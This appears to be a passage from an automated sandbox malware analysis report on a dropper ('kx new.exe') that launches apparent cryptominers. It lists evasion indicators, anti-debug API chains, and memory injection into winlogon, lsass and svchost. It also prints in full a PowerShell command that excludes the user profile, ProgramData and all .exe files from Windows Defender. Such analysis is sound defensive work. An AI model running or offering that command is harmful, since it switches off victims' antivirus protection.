Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,45_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5412Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8467Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1032Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8532Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891Jump to behavior
Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1659
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4973
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5027
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8014
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1937
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 3272
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9871
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_73-15397
Source: C:\Windows\System32\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_10-14922
Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_75-15105
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_74-14941
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_59-16956
Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_45-409
Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 6.7 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 8467 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 1032 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 8532 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 891 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1984Thread sleep count: 254 > 30Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1984Thread sleep time: -254000s >= -30000sJump to behavior
Source: C:\Windows\System32\dialer.exe TID: 3552Thread sleep count: 1659 > 30
Source: C:\Windows\System32\dialer.exe TID: 3552Thread sleep time: -165900s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep count: 4973 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep time: -4973000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep count: 5027 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7816Thread sleep time: -5027000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep count: 8014 > 30
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep time: -8014000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep count: 1937 > 30
Source: C:\Windows\System32\lsass.exe TID: 7936Thread sleep time: -1937000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7924Thread sleep count: 3272 > 30
Source: C:\Windows\System32\svchost.exe TID: 7924Thread sleep time: -3272000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8060Thread sleep count: 9871 > 30
Source: C:\Windows\System32\dwm.exe TID: 8060Thread sleep time: -9871000s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9DCE0 FindFirstFileExW,10_2_000002534CF9DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175DCE0 FindFirstFileExW,59_2_000002E99175DCE0
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCEDCE0 FindFirstFileExW,73_2_00000213BDCEDCE0
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DDCE0 FindFirstFileExW,74_2_00000158709DDCE0
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167DCE0 FindFirstFileExW,75_2_0000026DB167DCE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <)QEmu
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_45-477
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_52-395
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF97D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF918B4 GetProcessHeap,HeapFree,10_2_000002534CF918B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\kx new.exeCode function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014D1
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF97D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002534CF9D2A4
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6218 SetUnhandledExceptionFilter,10_2_000002534CFA6218
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766218 SetUnhandledExceptionFilter,59_2_000002E991766218
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_000002E99175D2A4
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991757D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_000002E991757D90
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000213BDCE7D90
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000213BDCED2A4
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCF6218 SetUnhandledExceptionFilter,73_2_00000213BDCF6218
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,74_2_00000158709DD2A4
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709E6218 SetUnhandledExceptionFilter,74_2_00000158709E6218
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,74_2_00000158709D7D90
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB1686218 SetUnhandledExceptionFilter,75_2_0000026DB1686218
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,75_2_0000026DB167D2A4
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB1677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,75_2_0000026DB1677D90

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2E991720000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 213BDCB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 158709A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 26DB15B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C9AFB80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C06F7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2917C380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22382750000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28A1B1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1486AD40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24BD3CA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA73D30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD021B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 269B9FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22054D80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C57DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A333B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F174530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23315740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A9C8540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EC212A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1876D540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22CD8950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15104330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22308E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AB19360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E731800000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: D50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 209D2560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC05190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AFD1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D6B0DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2036E550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2480FAC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2671A930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C588F90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A8857C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 174DEDC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 282A2110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA09D90000 protect: page execute and read and write
